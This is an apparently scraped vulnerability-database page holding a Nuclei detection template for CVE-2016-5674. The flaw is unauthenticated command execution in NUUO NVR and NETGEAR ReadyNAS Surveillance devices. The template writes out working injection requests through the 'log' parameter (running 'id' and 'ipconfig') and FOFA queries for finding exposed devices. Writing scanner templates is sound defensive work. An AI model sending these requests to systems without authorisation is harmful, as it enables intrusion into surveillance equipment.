Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-5674
HistoryApr 01, 2024 - 11:40 a.m.

NUUO NVR camera `debugging_center_utils_.php` - Command Execution

2024-04-0111:40:38
ProjectDiscovery
github.com
16
nuuo
cve2016
command-execution
netgear
remote-code-execution

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.4 High

AI Score

Confidence

High

0.958 High

EPSS

Percentile

99.5%

__debugging_center_utils___.php in NUUO NVRmini 2 1.7.5 through 3.0.0, NUUO NVRsolo 1.7.5 through 3.0.0, and NETGEAR ReadyNAS Surveillance 1.1.1 through 1.4.1 allows remote attackers to execute arbitrary PHP code via the log parameter.
id: CVE-2016-5674

info:
  name: NUUO NVR camera `debugging_center_utils_.php` - Command Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    __debugging_center_utils___.php in NUUO NVRmini 2 1.7.5 through 3.0.0, NUUO NVRsolo 1.7.5 through 3.0.0, and NETGEAR ReadyNAS Surveillance 1.1.1 through 1.4.1 allows remote attackers to execute arbitrary PHP code via the log parameter.
  reference:
    - http://www.kb.cert.org/vuls/id/856152
    - https://www.exploit-db.com/exploits/40200/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-5674
    cwe-id: CWE-20
    epss-score: 0.95793
    epss-percentile: 0.99431
    cpe: cpe:2.3:a:netgear:readynas_surveillance:1.1.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: netgear
    product: "readynas_surveillance"
    fofa-query:
      - "app=\"NUUO-NVRmini\" || app=\"NUUO-NVR\" || title=\"Network Video Recorder Login\""
      - app="nuuo-nvrmini" || app="nuuo-nvr" || title="network video recorder login"
  tags: cve,cve2016,nuuo,rce,netgear
variables:
  rand: "{{to_lower(rand_text_alpha(32))}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20id"
      - "{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20ipconfig"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200"
          - "contains(body_1, 'Debugging Center')"
          - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body_1)"
        condition: and

      - type: dsl
        dsl:
          - "status_code_2 == 200"
          - "contains(body_2, 'Debugging Center')"
          - "contains(body_2, 'Windows IP')"
        condition: and
# digest: 4a0a00473045022077af93ab3f7b752a3fc8676fad34d3fd997fd438917a7cc5242af60fab4ca1bc022100b67d707d34c5e15724fcfcc966c4e550015f2255b50e624eca23d3323cb0c9b9:922c64590222798bb761d5b6d8e72950

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.4 High

AI Score

Confidence

High

0.958 High

EPSS

Percentile

99.5%